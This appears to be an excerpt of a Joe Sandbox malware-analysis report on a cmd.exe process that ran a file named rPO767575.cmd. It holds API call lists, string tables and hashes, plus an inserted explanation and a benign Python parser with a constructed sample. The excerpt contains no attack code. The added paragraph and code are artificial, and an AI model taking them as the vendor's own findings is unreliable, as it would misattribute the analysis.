                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                              • Instruction ID: 0e72c33b1ffc881289be9352e4b2ab3f500441efd4ef5ea920e8a5d69058bdd6
                              • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                              • Instruction Fuzzy Hash: 56F0B421B0D78180EF44AF97B58012992A09B48BE0F8C8334EE7D47BDDDE3CD8518300
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                              • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                              • API String ID: 1388555566-2647954630
                              • Opcode ID: 07ad72d4fce8342379dbca2ded486eaf5380facafb96a7de50d87fe1bf7b2cad
                              • Instruction ID: fd79aa2a169f07fb3572d49579fab4706779e31cad1be75348cf6dfb9cdd316f
                              • Opcode Fuzzy Hash: 07ad72d4fce8342379dbca2ded486eaf5380facafb96a7de50d87fe1bf7b2cad
                              • Instruction Fuzzy Hash: 9DA27171A0C782C6EB10BF26A4941B9E6A1FB89B84F888135DE4E477DDDF3DE444A710
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                              • String ID: &<|>$+: $:$:EOF$=,;$^
                              • API String ID: 511550188-726566285
                              • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                              • Instruction ID: 88b4d85716db4e1b88fef443562d81b94bbe47d91951bf4ddbf4698e33e52324
                              • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                              • Instruction Fuzzy Hash: FF528F21A0C692C6FB24BF16A484279E6E1FB95B44FCC4135DE4E036D8DF3CE945A720
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsnicmp$wcschr$wcstol
                              • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                              • API String ID: 1738779099-3004636944
                              • Opcode ID: 524a9485643aabb091361d6b16ddfe7c9a3cfc40a98c1ea6d538c196b1212b63
                              • Instruction ID: 32fd22ff55eb21d4409b7ad7e1617d95f3923f57e242e1382a9926c2f17be922
                              • Opcode Fuzzy Hash: 524a9485643aabb091361d6b16ddfe7c9a3cfc40a98c1ea6d538c196b1212b63
                              • Instruction Fuzzy Hash: EF725F26F0C652C6E710BF6694886B9B7F1FB94B88F894035CE0D577D8DE3CA855A320
                              APIs
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F27F44
                              • _get_osfhandle.MSVCRT ref: 00007FF744F27F5C
                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F27F9E
                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F27FFF
                              • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28020
                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28036
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28061
                              • RtlFreeHeap.NTDLL ref: 00007FF744F28075
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F280D6
                              • RtlFreeHeap.NTDLL ref: 00007FF744F280EA
                              • _wcsnicmp.MSVCRT ref: 00007FF744F28177
                              • _wcsnicmp.MSVCRT ref: 00007FF744F2819A
                              • _wcsnicmp.MSVCRT ref: 00007FF744F281BD
                              • _wcsnicmp.MSVCRT ref: 00007FF744F281DC
                              • _wcsnicmp.MSVCRT ref: 00007FF744F281FB
                              • _wcsnicmp.MSVCRT ref: 00007FF744F2821A
                              • _wcsnicmp.MSVCRT ref: 00007FF744F28239
                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28291
                              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F282D7
                              • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F282FB
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F2831A
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28364
                              • RtlFreeHeap.NTDLL ref: 00007FF744F28378
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F2839A
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F283AE
                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F283E6
                              • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28403
                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28418
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                              • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                              • API String ID: 3637805771-3100821235
                              • Opcode ID: 850dcbeef8071bc1ba491ee474855cf363d50a31b10de6fe1cf39c68a2eba243
                              • Instruction ID: bdbd9e565c051ae0c14a6602d3bc232970382b21f3ade09fb21be2aee44fa69e
                              • Opcode Fuzzy Hash: 850dcbeef8071bc1ba491ee474855cf363d50a31b10de6fe1cf39c68a2eba243
                              • Instruction Fuzzy Hash: 50E15D31A0CA52CBE710BF66A484179FAA1FB49B95BC89234CD1E537D8DF3DA405E720
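Every function record in this section lists its call sites in the same one-line form, and the Memory Dump Source line gives the image base (Offset: 00007FF744F00000) that turns those absolute addresses into image-relative offsets. The strings these records carry (onecore\base\cmd\maxpathawarestring.cpp, COMSPEC, the START switches /K, ABOVENORMAL, AFFINITY, BELOWNORMAL, HIGH, LOW, MAX, MIN, NEWWINDOW, NODE, NORMAL, REALTIME, SEPARATE, SHARED and WAIT, the FOR /F options delims=, eol=, skip=, tokens= and usebackq, and the cd/chdir/md/mkdir/pushd/rd/rmdir table) belong to cmd.exe's own command parsers, so what is dumped here for process 4 is the interpreter that ran rPO767575.cmd rather than a DBatLoader payload. A practitioner who wants to confirm that nothing in that image was patched in memory compares a function's API sequence at a given offset with the same offset in a clean cmd.exe. The following Python is an added example, not part of the Joe Sandbox report: it parses call-site lines in the format shown above (the six sample lines are copied from the record above, with the observed-argument lists shortened, and are a constructed sample), computes image-relative offsets using the base from that record, and produces the address-ordered API sequence and a per-module count.

```python
import re
from collections import Counter

# Constructed sample: six call-site lines copied from the cmd.exe (process 4)
# API list above, argument lists shortened. Joe Sandbox prints one call site
# per line as either
#   • <Api>.<Module>(<observed args>), ref: <address>
#   • <Api>.<Module> ref: <address>
SAMPLE_APIS = """\
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00000000,0000237B), ref: 00007FF744F27F44
• _get_osfhandle.MSVCRT ref: 00007FF744F27F5C
• ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000000,00000000,0000237B), ref: 00007FF744F28020
• RtlFreeHeap.NTDLL ref: 00007FF744F28075
• _wcsnicmp.MSVCRT ref: 00007FF744F28177
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000000,00000000,0000237B), ref: 00007FF744F2831A
"""

# Image base taken from the "Offset:" field of the Memory Dump Source line.
IMAGE_BASE = 0x00007FF744F00000

# api name, module (api-set or DLL name), optional argument list, call-site address
CALL_RE = re.compile(
    r"^\s*•\s*(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_.\-]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_api_calls(text):
    """Return one dict per call-site line; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args,
            "ref": int(m.group("ref"), 16),
        })
    return calls


def rva(address, base=IMAGE_BASE):
    """Image-relative offset of a call site, usable to find it in the on-disk binary."""
    if address < base:
        raise ValueError("address lies below the image base")
    return address - base


def call_sequence(calls):
    """API names in address order: the signature to diff against a clean build."""
    return [c["api"] for c in sorted(calls, key=lambda c: c["ref"])]


def calls_by_module(calls):
    """How many call sites resolve through each api-set or DLL."""
    return Counter(c["module"] for c in calls)


if __name__ == "__main__":
    parsed = parse_api_calls(SAMPLE_APIS)
    for c in parsed:
        print(f"{c['ref']:016X}  rva=0x{rva(c['ref']):X}  {c['module']}!{c['api']}")
    print(call_sequence(parsed))
    print(dict(calls_by_module(parsed)))
```

The regex deliberately accepts both line shapes the report uses (with and without an observed-argument list), and a line that matches neither is skipped rather than raising, since the Similarity and Memory Dump Source lines sit in the same text block as the call sites.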
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                              • String ID: %s$%s
                              • API String ID: 3623545644-3518022669
                              • Opcode ID: 093f3dfa9510485640a0a09713243c3e58f1671b7647742024e8090a46a21fa5
                              • Instruction ID: 975e644867c7b947a154866187c7922bb1c1e3f0e1bc732d8cddf19edb65f20f
                              • Opcode Fuzzy Hash: 093f3dfa9510485640a0a09713243c3e58f1671b7647742024e8090a46a21fa5
                              • Instruction Fuzzy Hash: 25D29031A0C642CAEB64BF6298C06B9B7A1FB85744F984135DE4E47ADDDF3DE804A710
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                              • String ID: %9d$%s
                              • API String ID: 4286035211-3662383364
                              • Opcode ID: aa057d756280f045963785478f908bc5155a264f2291532fcb8459cd8d8c127e
                              • Instruction ID: 0e2f2e07555b943ddf0d3dd69526271478d2febf05090a98ba637d94b01db27a
                              • Opcode Fuzzy Hash: aa057d756280f045963785478f908bc5155a264f2291532fcb8459cd8d8c127e
                              • Instruction Fuzzy Hash: C2529232A0DA82CAEB64BF6298942F9B7A0FB85759F884131DE0E477D8DF3CD5449710
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                              • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                              • API String ID: 3305344409-4288247545
                              • Opcode ID: d1ddba57f368c07054d7056cc9105995f339553d81141ebae01c3632c7bd5acf
                              • Instruction ID: 6924fec0889ef19d2bd7909bd806cf98f0304c6ba69efb2bf86a8cacc215279b
                              • Opcode Fuzzy Hash: d1ddba57f368c07054d7056cc9105995f339553d81141ebae01c3632c7bd5acf
                              • Instruction Fuzzy Hash: DC429221A0D682C6EB50BF1399902B9E6B0EF89B95F8C4135DD5E477D9DF3CE844A320
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                              • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                              • API String ID: 388421343-2905461000
                              • Opcode ID: 91aa278bae488f07ca69690407c5ac2f944185e63ade342298008147df7553ae
                              • Instruction ID: 5f55e176528d11ecf72b878e2fb3b1a585c613e1708ae77f08e6ae228aaec5b3
                              • Opcode Fuzzy Hash: 91aa278bae488f07ca69690407c5ac2f944185e63ade342298008147df7553ae
                              • Instruction Fuzzy Hash: E5F1FD32A0DA82C6E760BF12A4857BAF7A4FB85744F885135DE4D426D9DF3CE844DB20
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcsrchr$towlower
                              • String ID: fdpnxsatz
                              • API String ID: 3267374428-1106894203
                              • Opcode ID: b3dec82012a9d7924db373b0270d97c85560a221f880c14b387572a373efb3d0
                              • Instruction ID: 7927c87449ab86ec829dd6fae3b56155e6a4ff1ca49b08f2967d84e1d322a32f
                              • Opcode Fuzzy Hash: b3dec82012a9d7924db373b0270d97c85560a221f880c14b387572a373efb3d0
                              • Instruction Fuzzy Hash: 63429321B0D682C6EB64BF2695942B9B6B1FB49B95F884135DE0E077CDDF3CE841A310
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                              • String ID: DPATH
                              • API String ID: 95024817-2010427443
                              • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                              • Instruction ID: fdf1c9d199881771c3676fd1c97f271bcde98bc2271fcff13a2e8f64a7f1daab
                              • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                              • Instruction Fuzzy Hash: BD129232A0C682C6E764BF169480179F6A1FB89B54F885235EE4E577DCDF7DE8009B10
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID:
                              • String ID: [...]$ [..]$ [.]$...$:
                              • API String ID: 0-1980097535
                              • Opcode ID: 2219ec0c8753013161cecaed1cdda4e0f6f768acbcc792b3dd0f248377f952d2
                              • Instruction ID: 00f86898cf6992f4a0ce273f20458596248873818a04d241eaec6b7694b1d6ac
                              • Opcode Fuzzy Hash: 2219ec0c8753013161cecaed1cdda4e0f6f768acbcc792b3dd0f248377f952d2
                              • Instruction Fuzzy Hash: 9B327D72A0CA82C6EB60FF6294942F9A7A0FB85784F894135DE0D476D9DF3CE505E720
                              APIs
                              • _wcsupr.MSVCRT ref: 00007FF744F2EF33
                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2EF98
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2EFA9
                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2EFBF
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF744F2EFDC
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2EFED
                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F003
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F022
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F083
                              • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F092
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F0A5
                              • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF744F2F0DB
                              • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F135
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F16C
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F185
                                • Part of subcall function 00007FF744F101B8: _get_osfhandle.MSVCRT ref: 00007FF744F101C4
                                • Part of subcall function 00007FF744F101B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F101D6
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                               • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                              • String ID: <noalias>$CMD.EXE
                              • API String ID: 1161012917-1690691951
                              • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                              • Instruction ID: 8e4a8cec4821cebf0119f23b162a3bddd5efd156707fcef8d8f470724f2b7f88
                              • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                              • Instruction Fuzzy Hash: 20918122B0C652CAFB14BF62E4801BDAAA0BF49B55FDC4135DE0E526DDDF3DA445A230
                              APIs
                              Strings
                              Memory Dump Source
